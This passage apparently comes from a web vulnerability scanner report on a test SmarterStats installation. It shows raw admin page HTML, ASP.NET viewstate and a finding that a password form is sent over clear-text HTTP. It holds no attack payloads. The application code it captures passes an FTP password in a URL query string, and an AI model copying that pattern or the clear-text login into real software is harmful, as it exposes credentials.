                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$2" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_2">Ask</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$10" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_10">Google (FR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$17" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_17">Google (MX)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$3" checked="checked" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_3">Bing</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$11" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_11">Google (HK)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$18" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_18">Google (NL)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$4" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_4">Google (AU)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$12" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_12">Google (IN)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$19" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_19">Google (TW)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$5" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_5">Google (BR)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$13" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_13">Google (IL)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$20" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_20">Google (RU)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$6" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_6">Google (CA)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$14" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_14">Google (IT)</label></td><td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$21" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_21">Google (UK)</label></td>
                       </tr><tr>
                           <td><input id="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7" type="checkbox" name="ctl00$MPH$ucSiteSeoSearchEngineSettings$chklistEngines_SettingCheckBox$7" /><label for="ctl00_MPH_ucSiteSeoSearchEngineSettings_chklistEngines_SettingCheckBox_7">Google (CN)</label></td><td></td><td></td>
                       </tr>
                   </table></td>
               </tr>
           </table>

               </span></div>
       
               
               
           </div>
   
       
</div>

       </div>
       
       
       <div id="ctl00_Footer" class="Footer">
           <div class="FooterNav">
               
   <div id="pgrLogWrapper">
       
<span class="HyperPagerWrapper" id="ctl00_NavPH_pgrLog">
<span class="HyperPager">
<span class="hpGroup">First</span>
<span class="hpGroup">&lt;&lt;</span>
<span class="hpGroup">&lt;</span>
<span class="hpPageCurrent">1</span>
<span class="hpPage">of 1</span>
<span class="hpGroup">&gt;</span>
<span class="hpGroup">&gt;&gt;</span>
<span class="hpGroup">Last</span>
</span>
</span>


   </div>

           </div>
           <div class="FooterSummary">
               
           </div>
       </div>

       <script type="text/javascript">
           document.ResizeEvent = function() { $('#Scrollable').ResizeToFit(); }
           var searchId = 'ctl00_SearchRow';
           if (parent.HelpPageID) parent.HelpPageID('admin/frmsite', '');
           $(function() {
               if (parent.DoneLoading) parent.DoneLoading();
               InitAjaxHandlers();
               RegisterResizeEvent();
           });
       </script>

       

   <script type="text/javascript">
   <!--

function DoPopupWindowClose() {
try {
if (window.opener) {
if (window.opener.DoRefresh) window.opener.DoRefresh(true);
if (window.opener._extContentElement.contentWindow.UpdateGrid)
window.opener._extContentElement.contentWindow.UpdateGrid(false);
}
} catch (err) { };
window.close();
}

function FtpBrowse()
{
var targetControlId = "ctl00_MPH_txtFtpDirectory";
var ftppassword = $("#ctl00_MPH_txtFtpPassword_SettingText").val();
var ftpuser = $("#ctl00_MPH_txtFtpUsername_SettingText").val();
var ftpport = $("#ctl00_MPH_txtFtpPort_SettingText").val();
var ftpserver = $("#ctl00_MPH_txtFtpServer").val();
var ftpwildcard = $("#ctl00_MPH_txtFtpWildcard_SettingText").val();
var url = "/Admin/Popups/frmFtpFileBrowser.aspx?password=" + ftppassword + "&username=" + ftpuser +
        "&port=" + ftpport + "&server=" + ftpserver + "&wildcard=" + ftpwildcard;
       parent.SpawnHyperWindowWithElement(url, 450, 400, DoNothing, $('#' + targetControlId));
}

   function SmarterLogBrowse()
   {
    var serverId = GetSelectedServerId();
    LogBrowseBase(serverId, "ctl00_MPH_txtSmarterLogDirectory");
   }
   
   function ExportLogBrowse()
   {
    var serverId = GetSelectedServerId();
    LogBrowseBase(serverId, "ctl00_MPH_txtExportLogDirectory");
   }
   
function LogBrowseBase(serverId, controlId) {
var url = "/Admin/Popups/frmRemoteFileBrowser.aspx?serverId="+serverId;
parent.SpawnHyperWindowWithElement(url, 450, 338, DoNothing, $('#' + controlId));
}

   function DoubleClick(newUrl, uid, isNew)
   {
SpawnHyperWindow(newUrl, 430, 200, DoRefresh);
   }

function ImportLogLocation() {
var serverId = GetSelectedServerId();
var url = "/Admin/Popups/frmPopupIISSiteList.aspx?serverId=" + serverId + "&UniqueID=9b4e05381dee4ab3baa4091821fa7b8d";
SpawnHyperWindow(url, 450, 338, UpdateIISImport);
}

   function GetSelectedServerId()
   {
    var lstServerClientId = "ctl00_MPH_lstServer_SettingDropDown";
    var lstServer = document.getElementById(lstServerClientId);
   
    if (lstServer)
    return lstServer.options[lstServer.selectedIndex].value;
    else
    return "0";
   }
   
   function DoNothing()
   {
   }
   
   function DoRefreshLogLocation()
   {
       __doPostBack('ctl00$MPH$btnRefresh','LogLocation');
   }
   
   function DoRefresh()
   {
    __doPostBack('ctl00$MPH$btnRefresh','');
   }
   
   function UpdateIISImport()
   {
    __doPostBack('ctl00$MPH$btnUpdateIISImport','');
   }
   
   function TabChanged(tabSelected)
{
       (tabSelected.attr('id') != "ctl00_TPH_HyperTabStrip1_HyperTabItem3") ? $("#logLocationButtons").hide() : $("#logLocationButtons").show();
       (tabSelected.attr('id') != "ctl00_TPH_HyperTabStrip1_HyperTabItem7") ? $("#pgrLogWrapper").hide() : $("#pgrLogWrapper").show();
}
       
   -->
   </script>


   

<script type="text/javascript">
//<![CDATA[

function ShowContextMenu_ctl00_MPH_ctl02(evt) {
   $('#ctl00_MPH_ctl02').showHyperContextMenu(evt);
   evt.cancelBubble = true;
   if (evt.stopPropagation) evt.stopPropagation();
   return false;
}
var confirmationDialogKeys = new Object();
confirmationDialogKeys['@Delete'] = 'Are you sure you want to delete the <span id="DeleteConfirmCount">0</span> selected item(s)?';
confirmationDialogKeys['@GenericDelete'] = confirmationDialogKeys['@Delete'];
confirmationDialogKeys['@DeleteConfirm'] = 'Are you sure you want to delete all items?';
confirmationDialogKeys['@PurgeConfirm'] = 'Are you sure you want to purge all items marked for deletion?';
$(function() { if (parent.UpdateCurrentPage) parent.UpdateCurrentPage('\x2fAdmin\x2ffrmSite\x2easpx?'); });
$('#ctl00_MPH_txtAdminNewPassword_SettingText').val('');
var ctl00_MPH_grdLogLocations_Url6485 = new Array();
function DelayedSetupctl00_MPH_grdLogLocations() { }
if (self.ctl00_MPH_grdLogLocationsHGIsCallback)
   DelayedSetupctl00_MPH_grdLogLocations();
else
   HGAddLoadEvent(function(){setTimeout(DelayedSetupctl00_MPH_grdLogLocations, 100);});
self.ctl00_MPH_grdLogLocationsHGIsCallback = true;
WebForm_AutoFocus('ctl00_MPH_txtDomainName_SettingText');$(function() { SetTopTitle('Sites'); });
$(function() { $('#ctl00_BPH_mnu1').hyperMenu({"ClearFloat":false,"IsContextMenu":false,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_BPH_mnu1_btnImport_btnImportIIS":"ImportLogLocation();"},"ClientCallbacks":{}}); });
function DoDeleteQuery_ctl00_BPH_btnDelete() {
   if (!self.ctl00_MPH_grdLogLocations) return ShowAlertWindow('No item has been selected');
   var count = ctl00_MPH_grdLogLocations.GetSelectedRowCount ? ctl00_MPH_grdLogLocations.GetSelectedRowCount() : ctl00_MPH_grdLogLocations.GetSelectedRows().length;
   if (count == 0) return ShowAlertWindow('No item has been selected');
   else parent.ShowConfirmWindow('Are you sure you want to delete the {0} selected item(s)?',count,'Generic',DoDelete_ctl00_BPH_btnDelete);
}
function DoDelete_ctl00_BPH_btnDelete() { __doPostBack('ctl00$BPH$btnDelete',''); }
$(function() { $('#ctl00_TPH_HyperTabStrip1').hyperTabStrip({"MultiPageClientID":"ctl00_MPH_MP1","FunctionMap":{},"PageViewMap":{"ctl00_TPH_HyperTabStrip1_HyperTabItem1":"ctl00_MPH_OptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem2":"ctl00_MPH_LogOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem3":"ctl00_MPH_LogLocationsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem4":"ctl00_MPH_LogFTPTab","ctl00_TPH_HyperTabStrip1_HyperTabItem5":"ctl00_MPH_SeoOptionsTab","ctl00_TPH_HyperTabStrip1_HyperTabItem7":"ctl00_MPH_LogStatusTab","ctl00_TPH_HyperTabStrip1_HyperTabItem8":"ctl00_MPH_SEOStatusTab"},"ClientCallbacks":{"onTabChanged":"TabChanged"}}); });
modules['vmNotBlank_txt']='Must have a value';
$(function() {$vc({"lt":"Site Name","vcID":"ctl00_MPH_txtDomainName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},true);});
modules['vmOptional_txt']='Value is optional';
$(function() {$vc({"lt":"Site Url","vcID":"ctl00_MPH_txtDomainUrl_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
modules['vmNumber_txt']='Must be a number';
modules['vmNumberGreater_txt']='Must be {0} or greater';
$(function() {$vc({"lt":"Site ID","vcID":"ctl00_MPH_txtSiteId_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Site Admin Username","vcID":"ctl00_MPH_txtAdminNewUserName_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"Site Admin Password","vcID":"ctl00_MPH_txtAdminNewPassword_SettingText","VMs":["vmNotBlank"],"VPs":{"vmRequired":true}},false);});
$(function() {$vc({"lt":"Export Url","vcID":"ctl00_MPH_txtLogFileExportLocURL_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() {$vc({"lt":"Default Documents (one per line)","vcID":"ctl00_MPH_txtDefaultDocuments_SettingText","VMs":["vmOptional"],"VPs":{"vmRequired":false}},false);});
$(function() { $('#ctl00_MPH_ctl02').hyperMenu({"ClearFloat":false,"IsContextMenu":true,"CollapseDelay":300,"DropShadows":true,"ClickableMenuItemsWithSubMenus":false,"FunctionMap":{"ctl00_MPH_ctl02_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd\u0027)","ctl00_MPH_ctl02_hm0_hm0":"__doPostBack(\u0027ctl00$BPH$mnu1\u0027,\u0027ctl00_BPH_mnu1_btnAdd_btnAddLogLocation\u0027)","ctl00_MPH_ctl02_hm1":"__doPostBack(\u0027ctl00$BPH$btnEdit\u0027,\u0027\u0027)","ctl00_MPH_ctl02_hm2":"DoDeleteQuery_ctl00_BPH_btnDelete();"},"ClientCallbacks":{}}); });
$(function() {$vc({"lt":"Max Keywords","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxKeywords_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Max Competitors","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxCompetitors_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
$(function() {$vc({"lt":"Max Position to Retrieve","vcID":"ctl00_MPH_ucSiteSeoSettings_txtSeoMaxRanking_SettingText","VMs":["vmNumber","vmNumberGreater"],"VPs":{"vmRequired":true,"vmNumberGreater":1}},false);});
//]]>
</script>
</form>
</body>
</html>


4.4. http://vulnerable.smarterstats.6.0.host:9999/Client/frmUser.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Client/frmUser.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password fields:

Request

GET /Client/frmUser.aspx HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SelectedLanguage=; STTTState=; STHashCookie={"CountsGuid":"727517837","TopBarSection":"AdminManage"}; ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; loginsettings=;

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 21:06:10 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17370
Connection: Close



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Users - SmarterStats
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Stats/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB66497A424400_1.6.3932.23374_&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
</head>
<body class="" dir="ltr">
   <form name="aspnetForm" method="post" action="frmUser.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTY5Mzc2NjAwMg8WBh4IX19fVGl0bGUFBVVzZXJzHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UWAmYPZBYCAgEPZBYIAgQPFgQeBXN0eWxlBQ1kaXNwbGF5Om5vbmU7HgdWaXNpYmxlaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh4EVGV4dGVkAgkPZBYCAgEPZBYCZg9kFgICAQ9kFgQCAg9kFgICAQ9kFgpmDw8WAh4KX19yZWFkT25seWhkZAIBDw8WBB8GaB8EaGRkAgIPZBYEZg8PFgIfBQUIUGFzc3dvcmRkZAIBD2QWAmYPD2QWAh4MYXV0b2NvbXBsZXRlBQNvZmZkAgMPZBYCAgEPZBYCZg8PZBYCHwcFA29mZmQCBQ8PFgIfBGhkFgICAQ9kFgJmDxBkZBYAZAIED2QWAgIBD2QWBmYPZBYCAgEPZBYCZg8QZA8WBmYCAQICAgMCBAIFFgYQBQVUb2RheQUFVG9kYXlnEAUJWWVzdGVyZGF5BQlZZXN0ZXJkYXlnEAULTGFzdCA3IERheXMFCUxhc3Q3RGF5c2cQBQxXZWVrIHRvIERhdGUFCldlZWtUb0RhdGVnEAUMTGFzdCAzMCBEYXlzBQpMYXN0MzBEYXlzZxAFDU1vbnRoIHRvIERhdGUFC01vbnRoVG9EYXRlZ2RkAgEPZBYCAgEPZBYCZg8QZA8WD2YCAQICAgMCBAIFAgYCBwIIAgkCCgILAgwCDQIOFg8QBQIxMAUCMTBnEAUCMjUFAjI1ZxAFAjUwBQI1MGcQBQMxMDAFAzEwMGcQBQM1MDAFAzUwMGcQBQQxMDAwBQQxMDAwZxAFBDIwMDAFBDIwMDBnEAUEMzAwMAUEMzAwMGcQBQQ0MDAwBQQ0MDAwZxAFBDUwMDAFBDUwMDBnEAUENjAwMAUENjAwMGcQBQQ3MDAwBQQ3MDAwZxAFBDgwMDAFBDgwMDBnEAUEOTAwMAUEOTAwMGcQBQUxMDAwMAUFMTAwMDBnZGQCAg9kFgICAQ9kFgJmDxBkDxYDZgIBAgIWAxAFBE5vbmUFBG5vbmVnEAUDQWxsBQNhbGxnEAUSVHJlbmQgUmVwb3J0cyBPbmx5BQl0cmVuZG9ubHlnZGQYAwUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgMFJWN0bDAwJE1QSCRjaGtEb21haW5BZG1pbl9TZXR0aW5nQ2hlY2sFJGN0bDAwJE1QSCRjaGtSZXNvbHZlSXBzX1NldHRpbmdDaGVjawUmY3RsMDAkTVBIJGNoa0F1dG9HZW5lcmF0ZV9TZXR0aW5nQ2hlY2sFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0yDzLiCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAOQFJlcG9ydE9wdGlvbnMB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAABBSZXBvcnRPcHRpb25zVGFiC2QFJmN0bDAwJFRQSCRIeXBlclRhYlN0cmlwMSRIeXBlclRhYkl0ZW0xDzLQCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQIAAAADa2V5BXZhbHVlAQIGBQAAAAdFbmFibGVkCAEBAfr////8////BgcAAAAEVGV4dAoB+P////z///8GCQAAAApSZXNvdXJjZUlEBgoAAAAFQFVzZXIB9f////z///8GDAAAAAhTZWxlY3RlZAgBAAHz/////P///wYOAAAAClBhZ2VWaWV3SUQGDwAAAAdVc2VyVGFiC2TOHjUeCRduRevfv/RSmyW87uYEyx4YQS4b58FeDGRZdw==" />
</div>

<script type="text/javascript">
//<![CDATA[
var theForm = document.forms['aspnetForm'];
if (!theForm) {
theForm = document.aspnetForm;
}
function __doPostBack(eventTarget, eventArgument) {
if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
theForm.__EVENTTARGET.value = eventTarget;
theForm.__EVENTARGUMENT.value = eventArgument;
theForm.submit();
}
}
//]]>
</script>


<script src="/WebResource.axd?d=b4Jug36ostX8XpQPkbGPZnB5weIJ8ZhZWVxc7eQ0ErH5Oqh2t7zqRaCIeIS69x83_6q-tRLaOXFfET7Z4zgwqpHnbsUcPkzlnuvFKsw3eu81&amp;t=634219308989960000" type="text/javascript"></script>


<script src="/ScriptResource.axd?d=2bJwBbBp-LjjroY_H--VfKxBI87QDMTJoxT55-6osUp4RWW1XG1VkdIsr1dLpsXsDtz8rHnzmIdXh-thDZxEdmifJ63O4K0Ln24KmulPk_iWRXYrxybK2sY_DVczrGLpqznYqYTd5E_dM3cytQJ6pstxS02nHoJt-ud1VYnn_Dw1&amp;t=2610f696" type="text/javascript"></script>
